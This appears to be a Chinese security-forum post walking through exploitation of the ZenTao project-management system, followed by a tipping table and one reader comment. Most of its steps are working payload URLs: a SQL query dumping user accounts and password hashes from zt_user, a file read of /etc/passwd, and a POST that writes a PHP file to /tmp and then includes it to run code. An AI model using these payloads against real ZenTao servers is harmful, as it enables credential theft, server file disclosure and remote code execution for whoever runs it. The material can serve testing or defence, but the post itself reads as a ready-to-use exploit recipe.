进入网站,选择开源版
查看版本http://127.0.0.1/zentao/index.php?mode=getconfig
payload:http://127.0.0.1/zentao/api-getModel-api-sql-sql=select+account,password+from+zt_user
payload:http://127.0.0.1/zentao/api-getModel-file-parseCSV-fileName=/etc/passwd
POST请求包发送数据
http://192.168.59.128/zentao/api-getModel-editor-save-filePath=/tmp/123
fileContent=<?php phpinfo()?>
(放在tmp下是因为其他目录可能有权限限制,不一定可以写进去)
查看文件,已被写入
访问123文件:
http://192.168.59.128/zentao/api-getModel-api-getMethod-filePath=/tmp/123
没有成功,查看源代码,发现需要给物理路径加上一层才可以。
http://192.168.59.128/zentao/api-getModel-api-getMethod-filePath=/tmp/123/1
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
1458376896 | 8.00 | 0 | 2024-02-01 20:08:53 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
zkaqzh
发表于 2021-10-11
这个是必须要登录才能进行sql注入吧
评论列表
加载数据中...